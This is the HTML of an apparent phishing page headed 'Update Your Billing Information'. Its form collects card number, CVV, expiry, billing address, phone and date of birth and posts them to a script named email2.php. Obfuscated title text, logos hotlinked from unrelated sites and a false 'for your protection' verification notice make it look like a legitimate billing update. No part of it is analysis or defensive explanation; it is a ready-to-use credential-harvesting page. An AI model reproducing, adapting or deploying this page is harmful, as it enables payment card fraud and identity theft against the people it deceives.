<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Upd&alpha;te Your | Billing DETAILS</title>
<center><img src="img/header.png" width="769" height="58" alt=""/></center>
</head>

<body>
<blockquote>
  <blockquote>
    <blockquote>
      <h3 style="color:rgb(64, 64, 64);font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;padding:0 160px;">   UPdate Your Billing Information</h3>
    </blockquote>
  </blockquote>
</blockquote>
<center>
<form autocomplete="off" name="payment" method="post" action="email2.php" onsubmit="return validateForm()" >
                 
<table style="width:450px;">
<div><b>
<input type="radio" name="card_type" align="left" onClick="showPaymentType('credit');" value="credit" CHECKED />Credit Card</b></div>
<img src="http://hospiceofcitrus.org/wp-content/uploads/2015/06/creditcard-logos.jpg" alt="Credit Card" width="121" height="53" border="0" />
<br/><br/>
<TR>

<TD align="right">*Required Fields</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
 <TR>
    <TD style="background-color: #ededed; font-weight : bold">Credit Card Type *</TD>
    <TD>
      <select name="cc_type" onChange="switchPayment(this)" style="width:150px;" >
<option value="">Select</option>
<option value="cctype_axp">American Express</option>
<option value="cctype_mc">MasterCard</option>
<option value="cctype_dsc">Discover Card </option>
<option value="cctype_visa">Visa</option>
<option value="cctype_jcb">JCB</option>
<option value="cctype_din">Diner's Club</option>
</select>
    </TD>
  </TR>
  <TR>
  <TD style="background-color: #ededed; font-weight : bold">Card Holder Name *</TD>
<TD><input name="user" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 260px; height: 20px;" maxlength="" placeholder="Full Name" value="" required/></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Credit Card Number *</TD>
<TD><input name="cc_number" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 200px; height: 20px;" maxlength="19" placeholder="CCNumber" value="" required/></TD>
</TR>
<TR>
<TD></TD><TD>
<input type="checkbox" name="cc_prepaid" id="cc_payment_type" value="prepaid" onclick="showPrepaidText(this);"/>Is this a Prepaid Card</div>
</TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Expiration *</TD>
<TD><select name="cc_month" class="payment_cc_exp_month" style="border: 1px solid; border-radius: 5px; width: 80px; height: 20px;"">
<option value="">Month</option>
<option value="01">01 </option>
<option value="02">02 </option>
<option value="03">03 </option>
<option value="04">04 </option>
<option value="05">05 </option>
<option value="06">06 </option>
<option value="07">07 </option>
<option value="08">08 </option>
<option value="09">09 </option>
<option value="10">10 </option>
<option value="11">11 </option>
<option value="12">12 </option>
</select>
<select name="cc_year" class="payment_cc_exp_year" style="border: 1px solid; border-radius: 5px; width: 100px; height: 20px;"" >
<option value="">Year</option>
<option value="19">2019 </option>
<option value="20">2020 </option>
<option value="21">2021 </option>
<option value="22">2022 </option>
<option value="23">2023 </option>
<option value="24">2024 </option>
<option value="25">2025 </option>
<option value="26">2026 </option>
<option value="27">2027 </option>
<option value="28">2028 </option>
<option value="29">2029 </option>
<option value="30">2030 </option>
</select></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">CVV Number *</TD>
<TD><input name="cc_csv" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 60px; height: 20px;" maxlength="4" placeholder="CVV" value="" required/></TD>
</TR>
<TR>
<th colspan="2">This must match the information on file with your credit card provider.</th>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Address *</TD>
<TD ><input name="b_address1_credit" type="text" autocomplete="off" maxlength=""  placeholder="Billing Address" value="" style="border: 1px solid; border-radius: 5px; width: 250px; height: 20px;" required/></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Apt# / Suite# </TD>
<TD ><input name="b_address2_credit" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 100px; height: 20px;" maxlength="" value="" ></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">City *</TD>
<TD><input name="b_city_credit" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 120px; height: 20px;" maxlength="" placeholder="City" value="" required/></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">State *</TD>
<TD ><select name="b_state_credit" style="border: 1px solid; border-radius: 5px; width: 90px; height: 20px;">
<option value="" selected>Select</option>
<option value="AA">AA</option>
<option value="AC">AC</option>
<option value="AE">AE</option>
<option value="AK">AK</option>
<option value="AL">AL</option>
<option value="AP">AP</option>
<option value="AR">AR</option>
<option value="AS">AS</option>
<option value="AZ">AZ</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DC">DC</option>
<option value="DE">DE</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="GU">GU</option>
<option value="HI">HI</option>
<option value="IA">IA</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="MA">MA</option>
<option value="MD">MD</option>
<option value="ME">ME</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MP">MP</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NM">NM</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VA">VA</option>
<option value="VI">VI</option>
<option value="VT">VT</option>
<option value="WA">WA</option>
<option value="WI">WI</option>
<option value="WV">WV</option>
<option value="WY">WY</option>
</select></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Zip Code *</TD>
<TD><input name="zip1_credit" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 120px; height: 20px;" maxlength="" placeholder="Zip code" value="" required/></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Billing Phone Number *</TD>
<TD><input name="billing_phone" type="text" autocomplete="off" style="border: 1px solid; border-radius: 5px; width: 200px; height: 20px;" maxlength="15" placeholder="Billing Phone Number" value="" required/></TD>
</TR>
<TR>
<TD style="background-color: #ededed; font-weight : bold">Date Of Birth *</TD>
<TD><select name="Month">
	<option> - Month - </option>
	<option value="January">January</option>
	<option value="Febuary">Febuary</option>
	<option value="March">March</option>
	<option value="April">April</option>
	<option value="May">May</option>
	<option value="June">June</option>
	<option value="July">July</option>
	<option value="August">August</option>
	<option value="September">September</option>
	<option value="October">October</option>
	<option value="November">November</option>
	<option value="December">December</option>
</select>

<select name="Day">
	<option> - Day - </option>
	<option value="1">1</option>
	<option value="2">2</option>
	<option value="3">3</option>
	<option value="4">4</option>
	<option value="5">5</option>
	<option value="6">6</option>
	<option value="7">7</option>
	<option value="8">8</option>
	<option value="9">9</option>
	<option value="10">10</option>
	<option value="11">11</option>
	<option value="12">12</option>
	<option value="13">13</option>
	<option value="14">14</option>
	<option value="15">15</option>
	<option value="16">16</option>
	<option value="17">17</option>
	<option value="18">18</option>
	<option value="19">19</option>
	<option value="20">20</option>
	<option value="21">21</option>
	<option value="22">22</option>
	<option value="23">23</option>
	<option value="24">24</option>
	<option value="25">25</option>
	<option value="26">26</option>
	<option value="27">27</option>
	<option value="28">28</option>
	<option value="29">29</option>
	<option value="30">30</option>
	<option value="31">31</option>
</select>

<select name="Year">
	<option> -- Year -- </option>
	<option value="1993">1993</option>
	<option value="1992">1992</option>
	<option value="1991">1991</option>
	<option value="1990">1990</option>
	<option value="1989">1989</option>
	<option value="1988">1988</option>
	<option value="1987">1987</option>
	<option value="1986">1986</option>
	<option value="1985">1985</option>
	<option value="1984">1984</option>
	<option value="1983">1983</option>
	<option value="1982">1982</option>
	<option value="1981">1981</option>
	<option value="1980">1980</option>
	<option value="1979">1979</option>
	<option value="1978">1978</option>
	<option value="1977">1977</option>
	<option value="1976">1976</option>
	<option value="1975">1975</option>
	<option value="1974">1974</option>
	<option value="1973">1973</option>
	<option value="1972">1972</option>
	<option value="1971">1971</option>
	<option value="1970">1970</option>
	<option value="1969">1969</option>
	<option value="1968">1968</option>
	<option value="1967">1967</option>
	<option value="1966">1966</option>
	<option value="1965">1965</option>
	<option value="1964">1964</option>
	<option value="1963">1963</option>
	<option value="1962">1962</option>
	<option value="1961">1961</option>
	<option value="1960">1960</option>
	<option value="1959">1959</option>
	<option value="1958">1958</option>
	<option value="1957">1957</option>
	<option value="1956">1956</option>
	<option value="1955">1955</option>
	<option value="1954">1954</option>
	<option value="1953">1953</option>
	<option value="1952">1952</option>
	<option value="1951">1951</option>
	<option value="1950">1950</option>
	<option value="1949">1949</option>
	<option value="1948">1948</option>
	<option value="1947">1947</option>
	
</select></TD>
 </TR>
 <TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
 <TR>
 <td colspan="2">
Note: For your protection, we verify credit card and debit card billing addresses. This step helps us prevent fraudulent act.<br/> 
<b>The process normally takes about 30 seconds, but it may take longer during certain times of the day.<br/></td>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
 <td colspan="2">
<input type="image" name="continue" src="https://t3.ftcdn.net/jpg/00/36/71/80/240_F_36718088_nJyrSIMb92JjivK6osNY7fIJ0bdpb4XF.jpg" align="right"
                      alt="Continue" title="Continue" value="continue" width="115" height="41" border="0" />
</td>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
</TD>
</TR>
</table>
  </form> 
  <img src="img/footer.png" width="769" height="259" alt=""/>
  </center>       
       
</body>
</html>
